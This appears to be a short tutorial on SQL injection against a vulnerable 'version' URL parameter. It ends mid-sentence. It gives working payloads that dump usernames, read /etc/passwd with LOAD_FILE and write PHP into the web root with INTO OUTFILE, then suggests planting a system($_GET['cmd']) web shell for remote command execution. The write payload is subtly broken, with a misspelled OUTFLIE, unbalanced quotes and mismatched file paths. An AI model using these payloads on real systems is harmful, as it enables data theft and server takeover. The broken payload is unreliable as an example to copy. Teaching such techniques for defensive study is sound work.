File Write via SQL
you probably know SQL injections. SQL injections provide a lot of fun concerning database manipulation. But it is also a great way to read and write files.
Consider the website
example.com. In our example, the application provides a version parameter that is susceptible to SQL injections. As consequence, an attacker is enabled to do database voodoo like
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,username FROM users--
This should return a list of user names that are stored in the table
users. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.
The following listing is slightly edited to give us the content of the file
/etc/passwd. This is done via LOAD_FILE. Note, this only works with files readable for the database user.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--
After reading files, let's go ahead writing them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,"<?php echo "hello world"; ?> INTO OUTFLIE "/var/www/vhosts/example.com/foobar.php"--
The fun part is, that our php statement is written into
/var/vhosts/example.com/foobar.php. Writing files is a big win for every adversary. A possible next step is to write
<? system($_GET['cmd']); ?> into a file readable for the web server. In case of success, the attacker has a nice remote shell by using